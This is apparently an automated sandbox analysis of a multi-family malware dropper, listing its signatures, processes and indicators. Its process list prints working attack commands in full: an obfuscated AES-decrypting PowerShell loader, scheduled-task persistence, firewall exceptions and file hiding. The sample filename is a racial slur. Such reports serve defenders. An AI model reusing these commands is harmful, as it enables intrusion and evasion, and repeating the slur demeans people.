Malware Analysis Report

2025-01-23 11:45

Sample ID 241204-p9yjgs1nbp
Target niggers.exe
SHA256 c26e2475ef60ba969bb66c9b464b498efb1da0bf7360ff7545c1db3b707bdbed
Tags
ammyyadmin asyncrat flawedammyy lumma metasploit modiloader neshta njrat quasar redline ta505 vidar xmrig xworm af458cf23e4b27326a35871876cc63d9 default office04 sgvp backdoor credential_access defense_evasion discovery evasion execution infostealer miner persistence privilege_escalation pyinstaller rat spyware stealer trojan upx vmprotect
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

c26e2475ef60ba969bb66c9b464b498efb1da0bf7360ff7545c1db3b707bdbed

Threat Level: Known bad

The file niggers.exe was found to be: Known bad.

Malicious Activity Summary

AmmyyAdmin payload

Asyncrat family

RedLine

Lumma Stealer, LummaC

Njrat family

Vidar

xmrig

TA505

njRAT/Bladabindi

Detect Xworm Payload

Lumma family

Neshta

Xworm family

Detect Vidar Stealer

Quasar family

FlawedAmmyy RAT

Xworm

Ammyy Admin

Flawedammyy family

Modiloader family

Quasar payload

Detect Neshta payload

XMRig Miner payload

Metasploit family

Ta505 family

Ammyyadmin family

ModiLoader, DBatLoader

Redline family

Vidar family

AsyncRat

Xmrig family

MetaSploit

Neshta family

Quasar RAT

RedLine payload

ModiLoader Second Stage

Async RAT payload

Contacts a large (554) amount of remote hosts

Uses browser remote debugging

Modifies Windows Firewall

Stops running service(s)

Sets file to hidden

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Loads dropped DLL

.NET Reactor protector

Checks computer location settings

VMProtect packed file

Executes dropped EXE

Power Settings

Network Service Discovery

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

AutoIT Executable

UPX packed file

Launches sc.exe

System Location Discovery: System Language Discovery

Program crash

Event Triggered Execution: Accessibility Features

Detects Pyinstaller

Access Token Manipulation: Create Process with Token

Unsigned PE

System Network Configuration Discovery: Internet Connection Discovery

Enumerates physical storage devices

NSIS installer

Gathers network information

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Scheduled Task/Job: Scheduled Task

Views/modifies file attributes

Kills process with taskkill

Suspicious use of AdjustPrivilegeToken

Opens file in notepad (likely ransom note)

Runs ping.exe

Runs net.exe

Delays execution with timeout.exe

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2024-12-04 13:02

Signatures

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-12-04 13:02

Reported

2024-12-04 13:05

Platform

win10v2004-20241007-en

Max time kernel

15s

Max time network

161s

Command Line

"C:\Users\Admin\AppData\Local\Temp\niggers.exe"

Signatures

Ammyy Admin

rat ammyyadmin

AmmyyAdmin payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Ammyyadmin family

ammyyadmin

AsyncRat

rat asyncrat

Asyncrat family

asyncrat

Detect Neshta payload

Description Indicator Process Target
N/A N/A N/A N/A

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

FlawedAmmyy RAT

trojan flawedammyy

Flawedammyy family

flawedammyy

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

MetaSploit

trojan backdoor metasploit

Metasploit family

metasploit

ModiLoader, DBatLoader

trojan modiloader

Modiloader family

modiloader

Neshta

persistence spyware neshta

Neshta family

neshta

Njrat family

njrat

Quasar RAT

trojan spyware quasar

Quasar family

quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

TA505

ta505

Ta505 family

ta505

Vidar

stealer vidar

Vidar family

vidar

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xmrig family

xmrig

Xworm

trojan rat xworm

Xworm family

xworm

njRAT/Bladabindi

trojan njrat

xmrig

miner xmrig

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A

Contacts a large (554) amount of remote hosts

discovery

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Stops running service(s)

evasion execution

.NET Reactor protector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A bitbucket.org N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A bitbucket.org N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Network Service Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\GameBarPresenceWriter.exe N/A

Power Settings

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\powercfg.exe N/A
N/A N/A C:\Windows\SysWOW64\powercfg.exe N/A
N/A N/A C:\Windows\SysWOW64\powercfg.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Access Token Manipulation: Create Process with Token

defense_evasion privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\mshta.exe N/A

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

Event Triggered Execution: Accessibility Features

persistence privilege_escalation

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\AV.scr N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\powershell.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\powershell.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\svchost.com N/A

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\ipconfig.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\UrlHausFiles\PowerShell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3900 wrote to memory of 1040 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\AppData\Local\Temp\niggers.exe
PID 3900 wrote to memory of 1040 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\AppData\Local\Temp\niggers.exe
PID 1040 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Windows\system32\cmd.exe
PID 1040 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Windows\system32\cmd.exe
PID 1040 wrote to memory of 4620 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe
PID 1040 wrote to memory of 4620 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe
PID 1040 wrote to memory of 4620 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe
PID 1040 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\Downloads\UrlHausFiles\PowerShell.exe
PID 1040 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\Downloads\UrlHausFiles\PowerShell.exe
PID 4700 wrote to memory of 1916 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4700 wrote to memory of 1916 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1040 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\Downloads\UrlHausFiles\AV.scr
PID 1040 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\Downloads\UrlHausFiles\AV.scr
PID 1040 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\Downloads\UrlHausFiles\AV.scr
PID 1040 wrote to memory of 4176 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\Downloads\UrlHausFiles\HRFuUub.exe
PID 1040 wrote to memory of 4176 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\Downloads\UrlHausFiles\HRFuUub.exe
PID 1040 wrote to memory of 4176 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\Downloads\UrlHausFiles\HRFuUub.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\niggers.exe

"C:\Users\Admin\AppData\Local\Temp\niggers.exe"

C:\Users\Admin\AppData\Local\Temp\niggers.exe

"C:\Users\Admin\AppData\Local\Temp\niggers.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\UrlHausFiles\payload1.bat" "

C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe

"C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe"

C:\Users\Admin\Downloads\UrlHausFiles\PowerShell.exe

"C:\Users\Admin\Downloads\UrlHausFiles\PowerShell.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Noninteractive -windowstyle hidden -e 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

C:\Users\Admin\Downloads\UrlHausFiles\AV.scr

"C:\Users\Admin\Downloads\UrlHausFiles\AV.scr" /S

C:\Users\Admin\Downloads\UrlHausFiles\HRFuUub.exe

"C:\Users\Admin\Downloads\UrlHausFiles\HRFuUub.exe"

C:\Users\Admin\Downloads\UrlHausFiles\COMSurrogate.exe

"C:\Users\Admin\Downloads\UrlHausFiles\COMSurrogate.exe"

C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe

"C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" "C:\Users\Admin\Downloads\UrlHausFiles\26.ps1"

C:\Users\Admin\Downloads\UrlHausFiles\skikda.exe

"C:\Users\Admin\Downloads\UrlHausFiles\skikda.exe"

C:\Users\Admin\Downloads\UrlHausFiles\SearchUII.exe

"C:\Users\Admin\Downloads\UrlHausFiles\SearchUII.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"

C:\Users\Admin\Downloads\UrlHausFiles\241.exe

"C:\Users\Admin\Downloads\UrlHausFiles\241.exe"

C:\Users\Admin\Downloads\UrlHausFiles\hercules.exe

"C:\Users\Admin\Downloads\UrlHausFiles\hercules.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4176 -ip 4176

C:\Users\Admin\Downloads\UrlHausFiles\241.exe

"C:\Users\Admin\Downloads\UrlHausFiles\241.exe"

C:\Users\Admin\Downloads\UrlHausFiles\ddd.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ddd.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4176 -s 1004

C:\Users\Admin\Downloads\UrlHausFiles\GOLD.exe

"C:\Users\Admin\Downloads\UrlHausFiles\GOLD.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 776 -ip 776

C:\Users\Admin\Downloads\UrlHausFiles\shell.exe

"C:\Users\Admin\Downloads\UrlHausFiles\shell.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 776 -s 752

C:\Users\Admin\Downloads\UrlHausFiles\payload.exe

"C:\Users\Admin\Downloads\UrlHausFiles\payload.exe"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "PowerShell" /tr "C:\Users\Admin\AppData\Roaming\PowerShell.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\UrlHausFiles\1krecrypted.cmd" "

C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe

"C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe"

C:\Users\Admin\Downloads\UrlHausFiles\test28.exe

"C:\Users\Admin\Downloads\UrlHausFiles\test28.exe"

C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe

"C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\Downloads\UrlHausFiles\1krecrypted.cmd';$ddkL='TrhqWFanshqWFfohqWFrmhqWFFihqWFnalhqWFBlhqWFochqWFkhqWF'.Replace('hqWF', ''),'DDPxXecoDPxXmDPxXprDPxXessDPxX'.Replace('DPxX', ''),'MaysmqinysmqMysmqodysmqulysmqeysmq'.Replace('ysmq', ''),'ReiHEpadiHEpLiiHEpnesiHEp'.Replace('iHEp', ''),'GCqdUetCqdUCuCqdUrCqdUreCqdUntPCqdUrCqdUocCqdUesCqdUsCqdU'.Replace('CqdU', ''),'InAKLIvoAKLIkAKLIeAKLI'.Replace('AKLI', ''),'LoJqASadJqAS'.Replace('JqAS', ''),'CopyfqFyTyfqFoyfqF'.Replace('yfqF', ''),'FrvXuAomvXuABvXuAasvXuAe6vXuA4StvXuArvXuAinvXuAgvXuA'.Replace('vXuA', ''),'CxbdihxbdianxbdigxbdieExbdixtexbdinxbdisixbdioxbdinxbdi'.Replace('xbdi', ''),'EleVQPZmeVQPZntVQPZAtVQPZ'.Replace('VQPZ', ''),'CNQbureaNQbutNQbueDNQbuecrNQbuypNQbutorNQbu'.Replace('NQbu', ''),'EoUdqnoUdqtoUdqryoUdqPoUdqoioUdqnoUdqtoUdq'.Replace('oUdq', ''),'ScSRUplcSRUitcSRU'.Replace('cSRU', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($ddkL[4])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function rInUE($tsSXg){$AjjqB=[System.Security.Cryptography.Aes]::Create();$AjjqB.Mode=[System.Security.Cryptography.CipherMode]::CBC;$AjjqB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$AjjqB.Key=[System.Convert]::($ddkL[8])('N/y0OKPKBqPZJ+saNe6tgR7TAn10dih8XZ0HebZ+uEc=');$AjjqB.IV=[System.Convert]::($ddkL[8])('Ls3mytPz2eg1HzNec7G7VA==');$BtIij=$AjjqB.($ddkL[11])();$tfdFv=$BtIij.($ddkL[0])($tsSXg,0,$tsSXg.Length);$BtIij.Dispose();$AjjqB.Dispose();$tfdFv;}function UajxO($tsSXg){$coXbk=New-Object System.IO.MemoryStream(,$tsSXg);$PWDcH=New-Object System.IO.MemoryStream;$GMuYT=New-Object System.IO.Compression.GZipStream($coXbk,[IO.Compression.CompressionMode]::($ddkL[1]));$GMuYT.($ddkL[7])($PWDcH);$GMuYT.Dispose();$coXbk.Dispose();$PWDcH.Dispose();$PWDcH.ToArray();}$hqZyL=[System.IO.File]::($ddkL[3])([Console]::Title);$Hvhxu=UajxO (rInUE ([Convert]::($ddkL[8])([System.Linq.Enumerable]::($ddkL[10])($hqZyL, 
5).Substring(2))));$LvPZo=UajxO (rInUE ([Convert]::($ddkL[8])([System.Linq.Enumerable]::($ddkL[10])($hqZyL, 6).Substring(2))));[System.Reflection.Assembly]::($ddkL[6])([byte[]]$LvPZo).($ddkL[12]).($ddkL[5])($null,$null);[System.Reflection.Assembly]::($ddkL[6])([byte[]]$Hvhxu).($ddkL[12]).($ddkL[5])($null,$null); "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Users\Admin\Downloads\UrlHausFiles\soporte%5Csoporteperfect.exe

"C:\Users\Admin\Downloads\UrlHausFiles\soporte%5Csoporteperfect.exe"

C:\Users\Admin\Downloads\UrlHausFiles\soporte%5Csoporteperfect.exe

"C:\Users\Admin\Downloads\UrlHausFiles\soporte%5Csoporteperfect.exe" -service -lunch

C:\Users\Admin\Downloads\UrlHausFiles\InstallSetup.exe

"C:\Users\Admin\Downloads\UrlHausFiles\InstallSetup.exe"

C:\Users\Admin\Downloads\UrlHausFiles\soporte%5Csoporteperfect.exe

"C:\Users\Admin\Downloads\UrlHausFiles\soporte%5Csoporteperfect.exe"

C:\Users\Admin\Downloads\UrlHausFiles\7rsuHCa.exe

"C:\Users\Admin\Downloads\UrlHausFiles\7rsuHCa.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4376 -ip 4376

C:\Users\Admin\AppData\Roaming\svchost.exe

"C:\Users\Admin\AppData\Roaming\svchost.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4376 -s 568

C:\Users\Admin\Downloads\UrlHausFiles\xxx.exe

"C:\Users\Admin\Downloads\UrlHausFiles\xxx.exe"

C:\Users\Admin\Downloads\UrlHausFiles\downloader.exe

"C:\Users\Admin\Downloads\UrlHausFiles\downloader.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\blockHost\Ft5ffBENLVBQ0TxN99.vbe"

C:\Users\Admin\AppData\Roaming\PowerShell.exe

C:\Users\Admin\AppData\Roaming\PowerShell.exe

C:\Users\Admin\Downloads\UrlHausFiles\c1.exe

"C:\Users\Admin\Downloads\UrlHausFiles\c1.exe"

C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe

"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe"

C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe"

C:\Users\Admin\Downloads\UrlHausFiles\winnit.exe

"C:\Users\Admin\Downloads\UrlHausFiles\winnit.exe"

C:\Users\Admin\Downloads\UrlHausFiles\rhnew.exe

"C:\Users\Admin\Downloads\UrlHausFiles\rhnew.exe"

C:\Users\Admin\Downloads\UrlHausFiles\GI59vO6.exe

"C:\Users\Admin\Downloads\UrlHausFiles\GI59vO6.exe"

C:\Users\Admin\Downloads\UrlHausFiles\SGVP%20Client%20Users.exe

"C:\Users\Admin\Downloads\UrlHausFiles\SGVP%20Client%20Users.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f

C:\Users\Admin\Downloads\UrlHausFiles\gU8ND0g.exe

"C:\Users\Admin\Downloads\UrlHausFiles\gU8ND0g.exe"

C:\Windows\SYSTEM32\attrib.exe

attrib +H +S C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\SYSTEM32\attrib.exe

attrib +H C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /f /CREATE /TN "MicrosoftEdgeUpdateTaskMachineCoreSC" /TR "C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe" /SC MINUTE

C:\Users\Admin\Downloads\UrlHausFiles\powershell.exe

powershell ping 127.0.0.1; del gU8ND0g.exe

C:\Users\Admin\Downloads\UrlHausFiles\ClientServices.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ClientServices.exe"

C:\Users\Admin\Downloads\UrlHausFiles\tR7DLnB.exe

"C:\Users\Admin\Downloads\UrlHausFiles\tR7DLnB.exe"

C:\Users\Admin\AppData\Local\Temp\is-SCB84.tmp\ClientServices.tmp

"C:\Users\Admin\AppData\Local\Temp\is-SCB84.tmp\ClientServices.tmp" /SL5="$202F8,965278,203776,C:\Users\Admin\Downloads\UrlHausFiles\ClientServices.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C timeout /T 3 & "C:\Users\Admin\Downloads\UrlHausFiles\ClientServices.exe" /VERYSILENT /SUPPRESSMSGBOXES

C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe

"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe"

C:\Users\Admin\Downloads\UrlHausFiles\ENP.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ENP.exe"

C:\Windows\SysWOW64\timeout.exe

timeout /T 3

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden

C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat

"C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat"

C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe

"C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" "C:\Users\Admin\Downloads\UrlHausFiles\paste.ps1"

C:\Users\Admin\Downloads\UrlHausFiles\ew.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ew.exe"

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\svchost.exe" "svchost.exe" ENABLE

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\Downloads\UrlHausFiles\SearchUII.exe" "SearchUII.exe" ENABLE

C:\Users\Admin\Downloads\UrlHausFiles\ClientServices.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ClientServices.exe" /VERYSILENT /SUPPRESSMSGBOXES

C:\Users\Admin\AppData\Local\Temp\is-OCRHC.tmp\ClientServices.tmp

"C:\Users\Admin\AppData\Local\Temp\is-OCRHC.tmp\ClientServices.tmp" /SL5="$5031A,965278,203776,C:\Users\Admin\Downloads\UrlHausFiles\ClientServices.exe" /VERYSILENT /SUPPRESSMSGBOXES

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\blockHost\mQaBLuUaoydrtjCUEEo9RzhnLMIcPb9fRdfVdNsoFovUVH.bat" "

C:\Windows\SysWOW64\regsvr32.exe

"regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\HollowSwallow.dll"

C:\blockHost\msServerFontDriver.exe

"C:\blockHost/msServerFontDriver.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

